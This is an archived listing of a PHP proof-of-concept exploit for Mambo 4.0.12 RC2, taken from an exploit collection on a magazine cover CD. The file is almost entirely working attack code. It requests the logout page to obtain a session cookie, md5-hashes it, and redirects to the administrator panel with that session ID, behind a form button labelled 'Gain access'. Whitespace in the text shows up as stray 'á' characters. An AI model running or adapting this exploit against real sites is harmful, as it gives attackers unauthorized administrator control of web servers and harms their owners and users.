Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / mambo / mamboexp.phps < prev

Wrap

PHP Script | 2005-02-12 | 3.5 KB | 78 lines

<?php /* ááámamboexp.php - Mambo 4.0.12 RC2 exploit - Proof of concept áááCopyright (C) 2003ááSimen Bergo (sbergo@thesource.no) áááThis program is free software; you can redistribute it and/or ááámodify it under the terms of the GNU General Public License áááas published by the Free Software Foundation; either version 2 of áááthe License or (at your option) any later version. áááThis program is distributed in the hope that it will be áááuseful, but WITHOUT ANY WARRANTY; without even the implied warranty áááof MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.ááSee the áááGNU General Public License for more details. áááYou should have received a copy of the GNU General Public License áááalong with this program; if not, write to the Free Software áááFoundation, Inc., 59 Temple Place - Suite 330, Boston, MAáá02111-1307, USA. */ /* áááThe problem is that Mambo Site Server does not check whether or not áááthe sessionid is created by the administrator login, or any other ááápart of the website. áááThis program will first connect to /index.php?option=logout which áááhands us a cookie. Then we will md5() encrypt this cookie and "login" áááat the administrator section. */ áááá áááá# Check if form was submitted ááááif (isset ($_POST['submit'])) { áááááááá# Connect to server áááááááá$handle = fsockopen ($_POST['hostname'], 80, &$errno, &$errstr); áááááááá# Halt processing if we we're unable to connect ááááááááif (!$handle) { die ("Unable to connect to <b>$hostname</b>"); } ááááááááelse { áááááááááááá# Get the webpage which will give us the cookie ááááááááááááfputs ($handle, "GET /" . trim($_POST['maindir'], "\x5c \x2f") . "/index.php?option=logout HTTP/1.0\nHost: {$_POST['hostname']}\n\n"); áááááááááááá# Loop through the contents áááááááááááá$buffer = ""; ááááááááááááwhile (!feof ($handle)) { áááááááááááááááá$buffer .= fgets ($handle, 2000); áááááááááááá} áááááááááááá# Create an array with each line as a seperate value áááááááááááá$arr = explode ("\n", $buffer); áááááááááááá# Loop through the array looking for the cookie ááááááááááááforeach ($arr as $value) { áááááááááááááááá# If we have found the cookie, proceed ááááááááááááááááif (eregi ("Set-Cookie: sessioncookie=", $value)) { áááááááááááááááááááá# Explode again, to sort out the sessionid áááááááááááááááááááá$var = explode ("=", $value); áááááááááááááááááááá# Now that we have all the information we need, we can redirect ááááááááááááááááááááheader ("Location: http://{$_POST['hostname']}/" . áááááááááááááááááááááááááááá trim($_POST['admdir'], "\x5c \x2f") . "/index2.php?session_id=" . md5(trim($var[1]))); áááááááááááááááá} áááááááááááá} áááááááá} áááá} ?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST"> áá<table border="0" cellspacing="0" cellpadding="0"> áááá<tr> áááááá<td width="120" height="30">Hostname</td> áááááá<td width="280" height="30"><input type="text" name="hostname" size="30" value="www.mamboserver.com"/></td> áááá</tr> áááá<tr> áááááá<td width="120" height="30">Main directory</td> áááááá<td width="280" height="30"><input type="text" name="maindir" size="30" value=""/></td> áááá</tr> áááá<tr> áááááá<td width="120" height="30">Admin directory</td> áááááá<td width="280" height="30"><input type="text" name="admdir" size="30" value="administrator"/></td> áááá</tr> áááá<tr> áááááá<td width="120" height="30"></td> áááááá<td width="280" height="30"><input type="submit" value="Gain access" name="submit"/> <input type="reset" value="Reset"/></td> áááá</tr> áá</table> </form>